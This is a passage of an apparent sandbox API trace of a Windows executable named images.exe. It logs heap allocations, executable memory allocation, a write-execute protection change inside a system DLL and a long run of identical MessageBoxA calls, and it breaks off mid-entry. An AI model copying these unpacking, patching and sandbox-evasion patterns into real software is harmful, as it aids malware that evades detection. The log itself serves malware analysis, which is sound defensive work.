RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0xd) returned 0x729058 [0260.339] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x1d) returned 0x71a870 [0260.339] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x31) returned 0x725498 [0260.339] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x15) returned 0x72b758 [0260.339] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x17) returned 0x72b9f8 [0260.339] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0xe) returned 0x728ed8 [0260.339] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x69) returned 0x7213e8 [0260.339] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x3e) returned 0x722610 [0260.339] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x1b) returned 0x71aac8 [0260.339] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x1d) returned 0x71ab40 [0260.339] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x48) returned 0x71fb50 [0260.339] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x12) returned 0x72b918 [0260.339] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x18) returned 0x72b8d8 [0260.339] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x1b) returned 0x71aaf0 [0260.339] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x24) returned 0x72c238 [0260.339] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x29) returned 0x71f5d8 [0260.339] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x1e) returned 0x71ab18 [0260.340] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x6b) returned 0x7202f8 [0260.340] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x17) returned 0x72b8f8 [0260.340] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x14) returned 0x72b998 [0260.340] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0xf) returned 0x728e78 [0260.340] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x16) returned 0x72b858 [0260.340] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x2a) returned 0x71f648 [0260.340] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x29) returned 0x71f6b8 [0260.340] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x12) returned 0x72b678 [0260.340] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x21) returned 0x72c448 [0260.340] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x16) returned 0x72b878 [0260.340] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x22) returned 0x72c268 [0260.340] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x12) returned 0x72b838 [0260.340] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x72bca8 | out: hHeap=0x710000) returned 1 [0260.342] GetModuleHandleW (lpModuleName="api-ms-win-core-synch-l1-2-0.dll") returned 0x75ac0000 [0260.511] GetProcAddress (hModule=0x75ac0000, lpProcName="SleepConditionVariableCS") returned 0x75bf7f60 [0260.511] GetProcAddress (hModule=0x75ac0000, lpProcName="WakeAllConditionVariable") returned 0x777c8d70 [0260.512] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x800) returned 0x72c5e8 [0260.514] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0260.514] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x407f5e) returned 0x0 [0260.680] GetProcessHeap () returned 0x710000 [0260.680] RtlWakeAllConditionVariable (in: ConditionVariable=0x54c044 | out: ConditionVariable=0x54c044) [0260.690] RtlWakeAllConditionVariable (in: ConditionVariable=0x54c044 | out: ConditionVariable=0x54c044) [0260.693] GetCurrentThreadId () returned 0xddc [0260.693] RtlWakeAllConditionVariable (in: ConditionVariable=0x54c044 | out: ConditionVariable=0x54c044) [0260.693] GetStartupInfoW (in: lpStartupInfo=0x19ff00 | out: lpStartupInfo=0x19ff00*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\ProgramData\\images.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0260.693] GetCommandLineA () returned="\"C:\\ProgramData\\images.exe\" " [0260.693] CoInitialize (pvReserved=0x0) returned 0x0 [0262.239] VirtualAlloc (lpAddress=0x0, dwSize=0xa00000, flAllocationType=0x3000, flProtect=0x40) returned 0x2340000 [0262.240] VirtualProtect (in: lpAddress=0x7574fec0, dwSize=0x100, flNewProtect=0x40, lpflOldProtect=0x19feb4 | out: lpflOldProtect=0x19feb4*=0x20) returned 1 [0262.344] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.344] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.344] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.344] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.344] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.344] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.344] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.344] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.344] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.345] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.345] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.345] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.345] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.345] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.345] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.345] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.345] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.345] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.345] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.345] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.345] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.345] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.345] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.345] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.345] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.345] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.345] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.345] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.345] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.345] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.345] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.345] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.345] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.345] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.345] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.345] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.345] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.345] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.345] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.346] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.346] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.346] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.346] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.346] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.346] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.346] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.346] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.346] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.346] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.346] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.346] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.346] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.346] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.346] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.346] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.346] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.346] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.346] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.346] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.346] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.346] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.346] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.346] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.346] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.346] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.346] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.346] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.346] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.347] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.347] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.347] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.347] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.347] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.347] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.347] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.347] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.347] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.347] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.347] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.347] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.347] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.347] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.347] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.347] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.347] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.347] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.347] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.347] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.347] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.347] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.347] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.347] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.347] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.347] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.347] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.347] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.348] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.348] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.348] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.348] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.348] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.348] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.348] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.348] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.348] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.348] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.348] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.348] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.348] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.348] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.348] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.348] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.348] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.348] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.348] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.348] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.348] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.348] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.348] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.348] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.348] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.348] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.348] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.348] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.348] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.349] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.349] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.349] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.349] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.349] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.349] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.349] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.349] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.349] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.349] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.349] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.349] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.349] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.349] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.349] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.349] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.349] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.349] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.349] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.349] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.349] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.349] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.349] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.349] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.349] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.349] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.350] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.350] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.350] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.350] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.350] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.350] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.350] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.350] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.350] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.350] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.350] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.350] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.350] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.350] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.350] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.350] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.350] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.350] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.350] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.356] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.356] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.356] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.356] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.356] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.356] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.356] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.356] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.356] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.356] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.356] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.357] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.357] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.357] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.357] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.357] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.357] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.357] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.357] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.357] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.357] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.357] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.357] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.357] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.357] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.357] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.357] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.357] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.357] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.357] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.357] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.357] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.357] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.357] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.357] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.357] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.357] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.357] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.357] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.357] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.358] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.358] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.358] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.358] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.358] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.358] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.358] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.358] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.358] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.358] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.358] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.358] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.358] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.358] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.358] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.358] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.358] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.358] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.358] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.358] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.358] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.358] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.358] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.358] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.358] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.358] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.358] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.358] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.358] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.359] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.359] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.359] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.359] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.359] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.359] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.359] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.359] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.359] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0262.359] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.397] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.398] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.398] MessageBoxA (hWnd=0x0, lpText="1", lpCaption="1", uType=0x1) returned -99 [0263.398] MessageBoxA (hWnd=0x0, lpText="1", 